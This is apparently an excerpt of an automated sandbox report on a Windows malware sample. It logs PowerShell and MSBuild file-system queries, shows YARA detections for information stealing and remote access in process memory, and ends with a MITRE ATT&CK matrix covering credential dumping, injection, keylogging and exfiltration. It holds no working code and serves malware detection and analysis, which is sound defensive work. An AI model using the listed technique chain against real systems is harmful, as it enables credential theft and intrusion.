                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F78964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF761F78964
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F72C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF761F72C54
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7256, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1d3bba895c8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7256, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts121
                  Windows Management Instrumentation
                  111
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  1
                  Obfuscated Files or Information
                  LSASS Memory3
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  11
                  Scheduled Task/Job
                  211
                  Process Injection
                  1
                  Software Packing
                  Security Account Manager127
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts22
                  Command and Scripting Interpreter
                  21
                  Registry Run Keys / Startup Folder
                  11
                  Scheduled Task/Job
                  1
                  Timestomp
                  NTDS111
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture4
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts11
                  Scheduled Task/Job
                  Network Logon Script21
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  LSA Secrets1
                  Process Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media2
                  PowerShell
                  RC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials141
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                  Virtualization/Sandbox Evasion
                  DCSync1
